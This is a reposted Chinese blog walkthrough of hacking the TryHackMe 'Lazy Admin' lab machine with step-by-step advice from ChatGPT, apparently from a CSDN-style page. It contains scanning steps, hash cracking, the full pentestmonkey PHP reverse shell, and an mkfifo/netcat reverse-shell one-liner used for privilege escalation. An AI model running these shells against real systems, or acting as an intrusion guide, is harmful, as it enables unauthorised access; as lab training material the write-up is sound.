实战 | ChatGPT在渗透中的利用(转载)

转载自安全帮Liveive

ChatGPT如何帮助我们渗透。

使用chatGPT渗透tryhackme.com 上的一台linux 机器“ Lazy Admin ”。

假设我只会一些基础的黑客知识,这时我们可以问 ChatGPT 渗透的第一步应该做什么。

它告诉我们应该收集目标信息并通过执行网络扫描找到目标漏洞,还建议使用 nmap 。然后询问 ChatGPT 在 Linux 中 Nmap 扫描的用法。

这是目标的 IP ,尝试渗透。

我修改了语法运行得更快!扫描结果: 22 ,80 打开,尝试访问 80 端口。

80 上运行了Apache2 。

询问 ChatGPT 如何对web服务器进行渗透测试.

它告诉我们使用gobuster扫描目录

获取敏感目录

/content  (Status: 301) [Size: 316] [--> http://10.10.117.255/content/

获取 CMS 版本。使用 GoBuster再次扫描content目录。

发现了更多目录,

发现 SQL 备份目录并找到 .SQL 文件,在SQL文件里找到了password hash

然后询问 ChatGPT,我们应该如何利用这些password hash。

按照它说去做。使用 CrackStation 平台破解password hash。https://crackstation.net/

破解出密码为Password123 使用破解的密码登录网站后台。

用户名:manager  密码:Password123

在Ads section,可以添加一个脚本来获得反向连接 ,我提前准备了 Php 反向 shell 。询问ChatGPT ,php 反向 shell 脚本怎么使用 。

它给出了可以尝试使用 pentest monkey 。以下是 pentest monkey 的代码!

<?php

// php-reverse-shell - A Reverse Shell implementation in PHP

// Copyright (C) 2007 pentestmonkey@pentestmonkey.net

set_time_limit (0);

$VERSION = "1.0";

$ip = '10.10.14.35'; // You have changed this

$port = 4420; // And this

$chunk_size = 1400;

$write_a = null;

$error_a = null;

$shell = 'uname -a; w; id; /bin/sh -i';

$daemon = 0;

$debug = 0;

//

// Daemonise ourself if possible to avoid zombies later

//

// pcntl_fork is hardly ever available, but will allow us to daemonise

// our php process and avoid zombies. Worth a try...

if (function_exists('pcntl_fork')) {

// Fork and have the parent process exit

$pid = pcntl_fork();

if ($pid == -1) {

printit("ERROR: Can't fork");

exit(1);

}

if ($pid) {

exit(0); // Parent exits

}

// Make the current process a session leader

// Will only succeed if we forked

if (posix_setsid() == -1) {

printit("Error: Can't setsid()");

exit(1);

}

$daemon = 1;

} else {

printit("WARNING: Failed to daemonise. This is quite common and not fatal.");

}

// Change to a safe directory

chdir("/");

// Remove any umask we inherited

umask(0);

//

// Do the reverse shell...

//

// Open reverse connection

$sock = fsockopen($ip, $port, $errno, $errstr, 30);

if (!$sock) {

printit("$errstr ($errno)");

exit(1);

}

// Spawn shell process

$descriptorspec = array(

0 => array("pipe", "r"), // stdin is a pipe that the child will read from

1 => array("pipe", "w"), // stdout is a pipe that the child will write to

2 => array("pipe", "w") // stderr is a pipe that the child will write to

);

$process = proc_open($shell, $descriptorspec, $pipes);

if (!is_resource($process)) {

printit("ERROR: Can't spawn shell");

exit(1);

}

// Set everything to non-blocking

// Reason: Occsionally reads will block, even though stream_select tells us they won't

stream_set_blocking($pipes[0], 0);

stream_set_blocking($pipes[1], 0);

stream_set_blocking($pipes[2], 0);

stream_set_blocking($sock, 0);

printit("Successfully opened reverse shell to $ip:$port");

while (1) {

// Check for end of TCP connection

if (feof($sock)) {

printit("ERROR: Shell connection terminated");

break;

}

// Check for end of STDOUT

if (feof($pipes[1])) {

printit("ERROR: Shell process terminated");

break;

}

// Wait until a command is end down $sock, or some

// command output is available on STDOUT or STDERR

$read_a = array($sock, $pipes[1], $pipes[2]);

$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);

// If we can read from the TCP socket, send

// data to process's STDIN

if (in_array($sock, $read_a)) {

if ($debug) printit("SOCK READ");

$input = fread($sock, $chunk_size);

if ($debug) printit("SOCK: $input");

fwrite($pipes[0], $input);

}

// If we can read from the process's STDOUT

// send data down tcp connection

if (in_array($pipes[1], $read_a)) {

if ($debug) printit("STDOUT READ");

$input = fread($pipes[1], $chunk_size);

if ($debug) printit("STDOUT: $input");

fwrite($sock, $input);

}

// If we can read from the process's STDERR

// send data down tcp connection

if (in_array($pipes[2], $read_a)) {

if ($debug) printit("STDERR READ");

$input = fread($pipes[2], $chunk_size);

if ($debug) printit("STDERR: $input");

fwrite($sock, $input);

}

}

fclose($sock);

fclose($pipes[0]);

fclose($pipes[1]);

fclose($pipes[2]);

proc_close($process);

// Like print, but does nothing if we've daemonised ourself

// (I can't figure out how to redirect STDOUT like a proper daemon)

functionprintit ($string) {

if (!$daemon) {

print "$string

";

}

}

?>

复制代码到Ads section创建一个文件。不要忘记更改 IP 和端口。设置您的 tun0 IP 并将端口更改为 9001。

修改后

点击Done后,会在目录生成反弹php脚本 .如下所示。

使用nc监听,获取反弹shell。

 nc -lvnp 9001

访问revshell.php,就会建立连接!

进入主目获取 flag.txt

将此复制粘贴到此处,这台机器将被视为被黑。

接下来,我们需要进行权限提升并获取 root 。输入以下命令

python3 -c 'import pty;pty.spawn("/bin/bash")'

接下来,输入这个,再次将其更改为 tun0 IP。

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.8.39.120 443 >//tmp/f" > /etc/copy.sh

现在,在端口 443 上启动另一个监听,如下所示:

最后,执行最后一个命令,将获得root权限

sudo perl /home/itguy/backup.pl

成功获取权限

这是第一篇简单介绍如何使用 ChatGPT 渗透测试的文章。在不久的将来,我会写更多关于 ChatGPT 的渗透文章。

转载自安全帮Live,如有侵权请联系删除

  • 2
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值